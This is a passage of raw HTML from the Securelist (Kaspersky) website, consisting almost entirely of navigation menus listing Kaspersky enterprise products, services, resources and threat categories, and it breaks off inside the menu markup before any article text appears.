src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/retail-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Retail Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Industries</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87724"><a href="https://www.kaspersky.com/enterprise-security/telecom?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Telecom Cybersecurity</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87725"><a href="https://www.kaspersky.com/enterprise-security/industries?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View all</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87726"><a href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Products</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87728"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112352"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><figure><img alt="" src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2024/04/10052437/k_Next_RGB_black_icon.png"></figure>Kaspersky Next <small class="label-inline red">NEW!</small></a><div class="desc"><p><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112323"><a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>XDR</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-endpoint-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87727"><figure><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Endpoint Security for Business</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-endpoint-detection-and-response menu-item menu-item-type-custom menu-item-object-custom menu-item-112324"><figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-detection-and-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Expert</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-hybrid-cloud-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87730"><figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/hybrid-cloud-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Optimum</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-anti-targeted-attack-platform menu-item menu-item-type-custom menu-item-object-custom menu-item-87731"><figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/anti-targeted-attack-platform.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Anti Targeted Attack Platform</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112325"><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Hybrid Cloud Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112326"><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SD-WAN</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-private-security-network menu-item menu-item-type-custom menu-item-object-custom menu-item-87732"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/private-security-network.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Industrial CyberSecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-embedded-systems-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87733"><figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/embedded-systems-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Container Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Products</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112328"><a href="https://www.kaspersky.com/enterprise-security/products/internet-gateway?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Internet Gateway</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112329"><a href="https://www.kaspersky.com/enterprise-security/embedded-systems?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Embedded Systems Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112330"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112331"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112332"><a href="https://www.kaspersky.com/enterprise-security/mail-server-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Mail Server</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87740"><a target="_blank" href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87741"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Services</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87742"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-cybersecurity-services menu-item menu-item-type-custom menu-item-object-custom menu-item-87743"><figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/cybersecurity-services.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Cybersecurity Services</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-105619"><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Security Awareness</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-premium-support menu-item menu-item-type-custom menu-item-object-custom menu-item-87745"><figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/premium-support.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Premium Support</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-intelligence menu-item menu-item-type-custom menu-item-object-custom menu-item-87746"><figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-intelligence.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Threat Intelligence</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-incident-response menu-item menu-item-type-custom menu-item-object-custom menu-item-87748"><figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/incident-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Managed Detection and Response</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-87747"><figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Compromise Assessment</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-112333"><figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SOC Consulting</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Services</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87751"><a href="https://www.kaspersky.com/enterprise-security/professional-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Professional Services</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87752"><a href="https://www.kaspersky.com/enterprise-security/incident-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Incident Response</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87753"><a href="https://www.kaspersky.com/enterprise-security/cyber-security-training?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Cybersecurity Training</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87755"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87756"><a href="https://www.kaspersky.com/enterprise-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Resource Center</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87757"><a href="https://www.kaspersky.com/enterprise-security/resources/case-studies?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Case Studies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87758"><a href="https://www.kaspersky.com/enterprise-security/resources/white-papers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">White Papers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87759"><a href="https://www.kaspersky.com/enterprise-security/resources/data-sheets?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Datasheets</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87760"><a href="https://www.kaspersky.com/enterprise-security/wiki-section/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Technologies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105620"><a href="https://www.kaspersky.com/MITRE?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">MITRE ATT&#038;CK</a> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87761"><a href="https://www.kaspersky.com/about?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">About Us</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105621"><a href="https://www.kaspersky.com/about/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105622"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105623"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105624"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105626"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Sponsorship</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105627"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105628"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Contacts</a> </ul> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87762"><a href="https://www.kaspersky.com/gdpr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">GDPR</a> </ul> </nav> </div> </header> <div class="mobile-menu-wrapper mobile-menu-wrapper--dark"> <ul class="mobile-nav" data-back="Back"> <li class="selector"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="button-link js-modal-open"><i class="font-icons icon-envelope"></i>Subscribe</a> <a href="#" class="button-link c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <a data-element-id="login-button" href="#" class="button-link js-kaspersky-sso-login"><svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg>Login</a> </li> <li class="title"> <span>Securelist menu</span> </li> <li class="parent" data-parent data-icon="top-item"><a data-element-id="lang-selector" href="#" class=""><i class="top-item"></i><span>English</span></a><ul class="submenu"><li class="menu-item"><a href="https://securelist.ru/lazarus-threatneedle/100591/">Russian</a></li><li class="menu-item"><a href="https://securelist.lat">Spanish</a></li></ul> <li class="parent" data-parent="Existing Customers" data-icon="font-icons top-item"><a rel="Existing Customers" href="#"><i class="font-icons top-item"></i><span>Existing Customers</span></a> <ul class="submenu"> <li class="parent" data-parent="Personal" data-icon="top-item"><a rel="Personal" href="#"><i class="top-item"></i><span>Personal</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87860"><a href="https://my.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">My Kaspersky</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105987"><a href="https://www.kaspersky.com/renewal-center/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105988"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Update your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105989"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Customer support</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105991"><a href="https://ksos.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">KSOS portal</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105992"><a href="https://cloud.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Business Hub</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105993"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Technical Support</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105994"><a href="https://www.kaspersky.com/small-to-medium-business-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Knowledge Base</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105995"><a href="https://www.kaspersky.com/renewal-center/vsb?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew License</a> </ul> </ul> <li class="parent" data-parent="Home" data-icon="font-icons top-item"><a rel="Home" href="#"><i class="font-icons top-item"></i><span>Home</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87778"><a href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Products</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87771"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Trials&#038;Update</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87859"><a href="https://www.kaspersky.com/resource-center?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Resource Center</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112353"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Next</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87776"><a href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Small Business (1-50 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87782"><a href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Medium Business (51-999 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87783"><a href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Enterprise (1000+ employees)</a> </ul> <li class="splitter"></li> <li class="title"><span>Securelist</span> <li class="parent" data-parent="" data-icon="top-item"><a href="https://securelist.com/threat-categories/"><i class="top-item"></i><span>Threats</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89472"><a href="https://securelist.com/threat-category/financial-threats/">Financial threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89467"><a href="https://securelist.com/threat-category/mobile-threats/">Mobile threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89471"><a href="https://securelist.com/threat-category/web-threats/">Web threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89468"><a href="https://securelist.com/threat-category/secure-environment/">Secure environment (IoT)</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89470"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/">Vulnerabilities and exploits</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89466"><a href="https://securelist.com/threat-category/spam-and-phishing/">Spam and Phishing</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-89469"><a href="https://securelist.com/threat-category/industrial-threats/">Industrial threats</a> </ul> <li class="parent" data-parent="" data-icon="top-item"><a href="https://securelist.com/categories/"><i class="top-item"></i><span>Categories</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-87880"><a 